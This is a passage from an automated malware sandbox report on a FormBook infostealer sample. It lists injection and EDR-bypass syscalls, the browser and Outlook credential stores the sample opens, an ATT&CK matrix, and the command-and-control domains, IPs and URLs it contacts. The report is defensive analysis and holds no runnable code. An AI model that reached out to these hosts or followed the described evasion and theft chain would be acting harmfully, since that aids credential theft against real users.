                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]2_2_03B008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00630B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00630B62
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00602622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00602622
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F083F
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F09D5 SetUnhandledExceptionFilter,0_2_005F09D5
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005F0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtClose: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\TCPSVCS.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEThread register set: target process: 7404Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEThread APC queued: target process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30CB008Jump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00631201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00631201
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00612BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00612BA5
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063B226 SendInput,keybd_event,0_2_0063B226
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_006522DA
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ofZiNLLKZU.exe"Jump to behavior
                Source: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exeProcess created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00630B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00630B62
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00631663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00631663
                Source: ofZiNLLKZU.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: ofZiNLLKZU.exe, kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: kwRriiLHUBrBci.exe, 00000004.00000002.3902106882.0000000001681000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000000.1650057348.0000000001680000.00000002.00000001.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000000.1805374626.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005F0698 cpuid 0_2_005F0698
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00648195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00648195
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0062D27A GetUserNameW,0_2_0062D27A
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0060B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0060B952
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005D42DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: ofZiNLLKZU.exeBinary or memory string: WIN_81
                Source: ofZiNLLKZU.exeBinary or memory string: WIN_XP
                Source: ofZiNLLKZU.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: ofZiNLLKZU.exeBinary or memory string: WIN_XPe
                Source: ofZiNLLKZU.exeBinary or memory string: WIN_VISTA
                Source: ofZiNLLKZU.exeBinary or memory string: WIN_7
                Source: ofZiNLLKZU.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00651204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00651204
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00651806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00651806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587873 Sample: ofZiNLLKZU.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.binjai77rtp11f.xyz 2->28 30 www.zrichiod-riech.sbs 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 ofZiNLLKZU.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 kwRriiLHUBrBci.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 TCPSVCS.EXE 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 kwRriiLHUBrBci.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 rokeyfashion.store 103.159.36.66, 49729, 49730, 49731 TWIDC-AS-APTWIDCLimitedHK unknown 22->34 36 b1-3-r111.kunlundns.top 101.32.205.61, 49725, 49726, 49727 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ofZiNLLKZU.exe71%ReversingLabsWin32.Trojan.AutoitInject
                ofZiNLLKZU.exe64%VirustotalBrowse
                ofZiNLLKZU.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ0%Avira URL Cloudsafe
                http://www.lucelight.info/up4e/0%Avira URL Cloudsafe
                http://www.rokeyfashion.store/nfd2/0%Avira URL Cloudsafe
                http://www.binjai77rtp11f.xyz/9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh0%Avira URL Cloudsafe
                http://www.absseguridad.online0%Avira URL Cloudsafe
